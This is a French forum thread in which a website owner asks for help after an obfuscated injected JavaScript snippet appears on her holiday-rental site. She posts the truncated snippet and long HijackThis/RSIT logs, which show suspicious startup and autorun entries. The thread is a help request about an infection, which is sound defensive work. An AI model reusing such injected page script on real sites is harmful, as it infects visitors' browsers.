> Tous les forums > Forum Sécurité
 cheval de troie
Ajouter un message à la discussion
Page : [1] 
Page 1 sur 1
chimere06200
  Posté le 20/02/2010 @ 17:13 
Aller en bas de la page 
Petite astucienne

Bonjour,

Je suis nouvelle sur ce forum et novice en informatique. J'ai un site (location de gîte). depuis quelques jours, il apparaît un drôle de message dont voici le contenu :


try{window.onload=function(){D1btocibhedx = '' + 'r!(!e#(@t(!a&@i&#)l!@@m@^!e&&n^o$()t&^&!-&@@c&#^o#)@m!.!&&m()((o@$n)$e@@#&y@$c!o@n)@!t$!$r)^o#^l!.(&c$o$@&m#).#&x)&e^&(-&c#o^$&m().!&@a$^!v&! ...
Comment me débarrasser de ce charabia et retrouver mon site propre car les visiteurs n'auront pas envie de s'aventurer sur le site avec un tel message.


Modifié par chimere06200 le 25/02/2010 11:34
Publicité
eliot3
 Posté le 20/02/2010 à 17:17 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Astucien

Bonsoir et bienvenue,

Supprimes ton lien quelqu'un mal protégé pourrait être infecté

Une serieuse attaque de ton site regardes ceci :

aurais tu été hacké



Modifié par eliot3 le 20/02/2010 17:20
chimere06200
 Posté le 20/02/2010 à 20:20 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Petite astucienne

Merci pour ta réponse. Je n'avance toujours pas et je ne sais pas si j'ai été hackée. Comment désactiver mon site ?

chimere06200
 Posté le 20/02/2010 à 22:23 
Aller en bas de la page Revenir au message précédent Revenir en haut de la page
Petite astucienne

Bonsoir,

Voici le résultat des rapports suite à vos conseils. A partir de là que dois-je faire.

Encore merci.

Logfile of random's system information tool 1.06 (written by random/random)
Run by maman at 2010-02-20 20:25:59
Microsoft® Windows Vista™ Édition Familiale Premium Service Pack 2
System drive C: has 89 GB (61%) free of 145 GB
Total RAM: 2046 MB (48% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:26:47, on 20/02/2010
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v8.00 (8.00.6001.18882)
Boot mode: Normal

Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QLBCTRL.exe
C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
C:\Program Files\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe
C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
C:\Program Files\QuickTime\qttask.exe
C:\Windows\WindowsMobile\wmdSync.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\Alwil Software\Avast5\AvastUI.exe
C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\Philips\SA28XX Device Manager\main.exe
C:\Windows\System32\rundll32.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Skype\Plugin Manager\skypePM.exe
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
C:\Program Files\Hewlett-Packard\Shared\HpqToaster.exe
C:\Windows\system32\conime.exe
C:\Program Files\Common Files\Adobe\Updater6\Adobe_Updater.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Users\maman\Saved Games\Downloads\RSIT.exe
C:\Program Files\trend micro\maman.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.fr/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=FR_FR&c=73&bd=Pavilion&pf=laptop
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=FR_FR&c=73&bd=Pavilion&pf=laptop
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: EoRezoBHO - {64F56FC1-1272-44CD-BA6E-39723696E350} - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [QlbCtrl] %ProgramFiles%\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [HP Health Check Scheduler] c:\Program Files\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe
O4 - HKLM\..\Run: [hpWirelessAssistant] %ProgramFiles%\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
O4 - HKLM\..\Run: [WAWifiMessage] %ProgramFiles%\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Windows Mobile-based device management] %windir%\WindowsMobile\wmdSync.exe
O4 - HKLM\..\Run: [NvSvc] RUNDLL32.EXE C:\Windows\system32\nvsvc.dll,nvsvcStart
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [avast5] C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe /nogui
O4 - HKLM\..\RunOnce: [Launcher] %WINDIR%\SMINST\launcher.exe
O4 - HKCU\..\Run: [LightScribe Control Panel] C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe -hidden
O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [Sony Ericsson PC Suite] "C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe" /systray /nologon
O4 - HKCU\..\RunOnce: [SpybotDeletingD3059] cmd.exe /c del "C:\Program Files\Everest Poker\casino.exe"
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE RÉSEAU')
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: Philips Gestionnaire de périphériques.lnk = C:\Program Files\Philips\SA28XX Device Manager\main.exe
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O13 - Gopher Prefix:
O16 - DPF: {D4323BF2-006A-4440-A2F5-27E3E7AB25F8} - http://a532.g.akamai.net/f/532/6712/5m/virtools.download.akamai.com/6712/player/install/installer.exe
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: Com4Qlb - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4Qlb.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: HP Health Check Service - Hewlett-Packard - c:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe
O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: Sony Ericsson OMSI download service (OMSI download service) - Unknown owner - C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe
O23 - Service: RoxMediaDB9 - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe
O23 - Service: SBSD Security Center Service (SBSDWSCService) - Safer Networking Ltd. - C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
O23 - Service: stllssvr - MicroVision Development, Inc. - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe
O23 - Service: Symantec AppCore Service (SymAppCore) - Unknown owner - c:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe (file missing)
O23 - Service: XAudioService - Conexant Systems, Inc. - C:\Windows\system32\DRIVERS\xaudio.exe

--
End of file - 9158 bytes

======Scheduled tasks folder======

C:\Windows\tasks\HPCeeScheduleFormaman.job
C:\Windows\tasks\Maintenance en 1 clic.job
C:\Windows\tasks\User_Feed_Synchronization-{837C62D4-F802-42E1-BA8C-0E2FF49DE2F0}.job

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
Adobe PDF Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27 75128]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{53707962-6F74-2D53-2644-206D7942484F}]
Spybot-S&D IE Protection - C:\PROGRA~1\SPYBOT~1\SDHelper.dll [2009-01-26 1879896]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{64F56FC1-1272-44CD-BA6E-39723696E350}]
EoBho Class - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL []

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
SSVHelper Class - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll [2008-06-10 509328]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7E853D72-626A-48EC-A868-BA8D5E23E045}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]
Programme d'aide de l'Assistant de connexion Windows Live - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-02-17 408440]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Windows Defender"=C:\Program Files\Windows Defender\MSASCui.exe [2008-01-19 1008184]
"SynTPEnh"=C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2007-01-13 827392]
"QlbCtrl"=C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [2007-02-13 159744]
"HP Health Check Scheduler"=c:\Program Files\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe [2008-06-16 75008]
"hpWirelessAssistant"=C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe [2007-03-01 472776]
"WAWifiMessage"=C:\Program Files\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe [2007-01-10 317128]
"HP Software Update"=C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [2006-12-10 49152]
"EoEngine"= []
"QuickTime Task"=C:\Program Files\QuickTime\qttask.exe [2008-03-02 98304]
"Adobe Reader Speed Launcher"=C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [2009-02-27 35696]
"Windows Mobile-based device management"=C:\Windows\WindowsMobile\wmdSync.exe [2006-11-02 215552]
"NvSvc"=C:\Windows\system32\nvsvc.dll [2007-09-19 86016]
"NvCplDaemon"=C:\Windows\system32\NvCpl.dll [2007-09-19 8497696]
"NvMediaCenter"=C:\Windows\system32\NvMcTray.dll [2007-09-19 81920]
"avast5"=C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe [2010-02-11 2756488]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Launcher"=C:\Windows\SMINST\launcher.exe [2006-11-07 44128]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"LightScribe Control Panel"=C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe [2007-04-19 484904]
"ehTray.exe"=C:\Windows\ehome\ehTray.exe [2008-01-19 125952]
"Skype"=C:\Program Files\Skype\Phone\Skype.exe [2009-06-26 25604904]
"WMPNSCFG"=C:\Program Files\Windows Media Player\WMPNSCFG.exe [2008-01-19 202240]
"SpybotSD TeaTimer"=C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe [2009-03-05 2260480]
"Sony Ericsson PC Suite"=C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe [2009-11-20 434176]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"SpybotDeletingD3059"=cmd.exe /c del C:\Program Files\Everest Poker\casino.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\32868532]
C:\ProgramData\32868532\32868532.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BitComet]
C:\Program Files\BitComet\BitComet.exe /tray []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\CTFMON]
C:\Windows\Temp\_ex-08.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Sony Ericsson PC Suite]
C:\Program Files\Sony Ericsson\Mobile2\Application Launcher\Application Launcher.exe /startoptions []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\sysgif32]
C:\Users\maman\AppData\Local\Temp\~TM50A7.tmp []

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
HP Digital Imaging Monitor.lnk - C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
Philips Gestionnaire de périphériques.lnk - C:\Program Files\Philips\SA28XX Device Manager\main.exe

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfPf]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfRd]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfSvc]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\WudfUsbccidDriver]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"LogonHoursAction"=2
"DontDisplayLogonHoursWarnings"=1

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"EnableUIADesktopToggle"=0

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=145

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"BindDirectlyToPropertySetStorage"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{0c39c2ac-4cb5-11dd-b620-001b24dd66d7}]
shell\Auto\command - AdobeR.exe e
shell\AutoRun\command - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL AdobeR.exe e

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{4bee0075-3ed8-11dd-b794-001b24dd66d7}]
shell\AutoRun\command - F:\c.cmd
shell\explore\command - F:\c.cmd
shell\open\command - F:\c.cmd


======File associations======

.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*
.txt - open - C:\Windows\notepad.exe %1

======List of files/folders created in the last 1 months======

2010-02-20 20:26:00 ----D---- C:\Program Files\trend micro
2010-02-20 20:25:59 ----D---- C:\rsit
2010-02-11 13:03:38 ----A---- C:\Windows\system32\tsbyuv.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\quartz.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msyuv.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msvidc32.dll
2010-02-11 13:03:38 ----A---- C:\Windows\system32\msrle32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\msvfw32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\mciavi32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\iyuv_32.dll
2010-02-11 13:03:37 ----A---- C:\Windows\system32\avifil32.dll
2010-02-10 21:14:37 ----D---- C:\ProgramData\BVRP Software
2010-02-10 21:11:04 ----A---- C:\ProgramData\hpeA6B.dll
2010-02-10 21:10:37 ----D---- C:\ProgramData\Sony Ericsson
2010-01-24 14:24:34 ----A---- C:\Windows\system32\aswBoot.exe
2010-01-24 11:31:29 ----A---- C:\Windows\wininit.ini
2010-01-24 11:05:34 ----D---- C:\ProgramData\Spybot - Search & Destroy
2010-01-24 11:05:34 ----D---- C:\Program Files\Spybot - Search & Destroy
2010-01-24 10:39:25 ----A---- C:\Windows\system32\mshtml.dll
2010-01-24 10:39:24 ----A---- C:\Windows\system32\ieframe.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\wininet.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\urlmon.dll
2010-01-24 10:39:23 ----A---- C:\Windows\system32\iertutil.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\occache.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\msfeedsbs.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\msfeeds.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\jsproxy.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\ieUnatt.exe
2010-01-24 10:39:22 ----A---- C:\Windows\system32\ieui.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iesysprep.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iepeers.dll
2010-01-24 10:39:22 ----A---- C:\Windows\system32\iedkcs32.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\msfeedssync.exe
2010-01-24 10:39:17 ----A---- C:\Windows\system32\iesetup.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\iernonce.dll
2010-01-24 10:39:17 ----A---- C:\Windows\system32\ie4uinit.exe
2010-01-23 22:39:44 ----D---- C:\ProgramData\Alwil Software
2010-01-23 16:56:16 ----A---- C:\Windows\ntbtlog.txt
2010-01-23 15:53:04 ----D---- C:\ProgramData\32868532
2010-01-23 08:39:56 ----D---- C:\Users\maman\AppData\Roaming\HpUpdate
2010-01-23 08:39:53 ----D---- C:\Windows\Hewlett-Packard

======List of files/folders modified in the last 1 months======

2010-02-20 20:26:14 ----D---- C:\Windows\Prefetch
2010-02-20 20:26:06 ----D---- C:\Windows\Temp
2010-02-20 20:26:00 ----RD---- C:\Program Files
2010-02-20 20:08:21 ----D---- C:\Users\maman\AppData\Roaming\Skype
2010-02-20 19:37:52 ----A---- C:\Windows\NeroDigital.ini
2010-02-20 19:36:49 ----D---- C:\Program Files\Mozilla Firefox
2010-02-20 16:09:25 ----D---- C:\Users\maman\AppData\Roaming\skypePM
2010-02-20 14:52:44 ----D---- C:\Users\maman\AppData\Roaming\FileZilla
2010-02-20 11:58:32 ----SHD---- C:\System Volume Information
2010-02-20 11:49:06 ----D---- C:\ProgramData\Skyline
2010-02-20 11:35:48 ----SHD---- C:\Windows\Installer
2010-02-20 11:35:43 ----D---- C:\ProgramData\Microsoft Help
2010-02-20 07:46:27 ----D---- C:\Windows\SMINST
2010-02-18 18:32:08 ----D---- C:\Windows
2010-02-16 16:20:22 ----D---- C:\Windows\System32
2010-02-16 16:20:22 ----D---- C:\Windows\inf
2010-02-16 16:20:22 ----A---- C:\Windows\system32\PerfStringBackup.INI
2010-02-13 13:53:55 ----D---- C:\Windows\system32\catroot2
2010-02-11 20:20:35 ----D---- C:\Windows\winsxs
2010-02-11 20:10:25 ----D---- C:\Windows\system32\catroot
2010-02-11 20:06:26 ----D---- C:\Windows\system32\drivers
2010-02-11 20:06:25 ----D---- C:\Program Files\Windows Mail
2010-02-10 21:14:37 ----HD---- C:\ProgramData
2010-02-10 21:10:37 ----HD---- C:\Program Files\InstallShield Installation Information
2010-02-10 21:10:37 ----D---- C:\Program Files\Sony Ericsson
2010-02-01 20:26:20 ----A---- C:\Windows\system32\mrt.exe
2010-01-31 11:48:33 ----D---- C:\Windows\Tasks
2010-01-31 11:48:33 ----D---- C:\Windows\system32\Tasks
2010-01-27 20:51:18 ----D---- C:\Program Files\Internet Explorer
2010-01-24 14:25:00 ----D---- C:\Program Files\Common Files\microsoft shared
2010-01-24 14:00:28 ----D---- C:\Users\maman\AppData\Roaming\Teleca
2010-01-24 14:00:24 ----D---- C:\Windows\Downloaded Installations
2010-01-24 14:00:11 ----D---- C:\Program Files\Common Files\Teleca Shared
2010-01-24 14:00:07 ----D---- C:\Program Files\Common Files
2010-01-24 13:54:46 ----D---- C:\Windows\system32\migration
2010-01-23 22:41:00 ----D---- C:\Program Files\Alwil Software

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr.sys [2010-02-11 23376]
R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2010-02-11 162512]
R1 aswTdi;avast! Network Shield Support; C:\Windows\system32\drivers\aswTdi.sys [2010-02-11 46672]
R1 eabfiltr;eabfiltr; C:\Windows\system32\DRIVERS\eabfiltr.sys [2006-11-30 8192]
R1 IDSvix86;Symantec Intrusion Prevention Driver; \??\C:\PROGRA~2\Symantec\DEFINI~1\SymcData\idsdefs\20080215.002\IDSvix86.sys [2008-02-13 261680]
R1 kl1;kl1; C:\Windows\system32\DRIVERS\kl1.sys [2007-10-31 110096]
R1 SRTSPX;SRTSPX; C:\Windows\System32\Drivers\SRTSPX.SYS [2007-11-30 43696]
R1 SYMTDI;SYMTDI; C:\Windows\System32\Drivers\SYMTDI.SYS [2007-10-30 191536]
R2 aswFsBlk;aswFsBlk; C:\Windows\system32\drivers\aswFsBlk.sys [2010-02-11 19024]
R2 aswMonFlt;aswMonFlt; \??\C:\Windows\system32\drivers\aswMonFlt.sys [2010-02-11 51792]
R2 mdmxsdk;mdmxsdk; C:\Windows\system32\DRIVERS\mdmxsdk.sys [2006-06-19 12672]
R2 rimmptsk;rimmptsk; C:\Windows\system32\DRIVERS\rimmptsk.sys [2007-02-24 39936]
R2 rimsptsk;rimsptsk; C:\Windows\system32\DRIVERS\rimsptsk.sys [2007-01-23 42496]
R2 rismxdp;Ricoh xD-Picture Card Driver; C:\Windows\system32\DRIVERS\rixdptsk.sys [2007-01-23 37376]
R2 XAudio;XAudio; C:\Windows\system32\DRIVERS\xaudio.sys [2006-11-28 8192]
R3 BCM43XX;Pilote pour carte réseau Broadcom 802.11; C:\Windows\system32\DRIVERS\bcmwl6.sys [2007-01-03 534016]
R3 CmBatt;Pilote pour Batterie à méthode de contrôle ACPI Microsoft; C:\Windows\system32\DRIVERS\CmBatt.sys [2008-01-19 14208]
R3 CnxtHdAudService;Conexant UAA Function Driver for High Definition Audio Service; C:\Windows\system32\drivers\CHDRT32.sys [2008-03-03 188416]
R3 HBtnKey;HBtnKey; C:\Windows\system32\DRIVERS\cpqbttn.sys [2006-06-28 9472]
R3 HSF_DPV;HSF_DPV; C:\Windows\system32\DRIVERS\HSX_DPV.sys [2006-12-07 985600]
R3 HSXHWAZL;HSXHWAZL; C:\Windows\system32\DRIVERS\HSXHWAZL.sys [2006-12-07 207360]
R3 NVENETFD;NVIDIA nForce Networking Controller Driver; C:\Windows\system32\DRIVERS\nvmfdx32.sys [2007-03-07 1059112]
R3 nvlddmkm;nvlddmkm; C:\Windows\system32\DRIVERS\nvlddmkm.sys [2007-09-19 7626400]
R3 nvsmu;nvsmu; C:\Windows\system32\DRIVERS\nvsmu.sys [2007-02-17 12032]
R3 sdbus;sdbus; C:\Windows\system32\DRIVERS\sdbus.sys [2009-04-11 89088]
R3 SymEvent;SymEvent; \??\C:\Windows\system32\Drivers\SYMEVENT.SYS [2007-12-22 123952]
R3 SynTP;Synaptics TouchPad Driver; C:\Windows\system32\DRIVERS\SynTP.sys [2007-01-13 181432]
R3 usbvideo;Périphérique vidéo USB (WDM); C:\Windows\System32\Drivers\usbvideo.sys [2008-01-19 134016]
R3 winachsf;winachsf; C:\Windows\system32\DRIVERS\HSX_CNXT.sys [2006-12-07 659968]
R3 WmiAcpi;Microsoft Windows Management Interface for ACPI; C:\Windows\system32\DRIVERS\wmiacpi.sys [2008-01-19 11264]
S3 BCM43XV;Pilote de la carte réseau extensible Broadcom 802.11; C:\Windows\system32\DRIVERS\bcmwl6.sys [2007-01-03 534016]
S3 Dot4;Pilote MS IEEE-1284.4; C:\Windows\system32\DRIVERS\Dot4.sys [2008-01-19 131584]
S3 Dot4Print;Pilote de classe Imprimante pour IEEE-1284.4; C:\Windows\system32\DRIVERS\Dot4Prt.sys [2008-01-19 16384]
S3 dot4usb;MS Dot4USB Filter Dot4USB Filter; C:\Windows\system32\DRIVERS\dot4usb.sys [2008-01-19 36864]
S3 drmkaud;Filtre de décodeur DRM (Noyau Microsoft); C:\Windows\system32\drivers\drmkaud.sys [2008-01-19 5632]
S3 E100B;Pilote de carte Intel (R) PRO; C:\Windows\system32\DRIVERS\e100b325.sys [2006-11-02 163328]
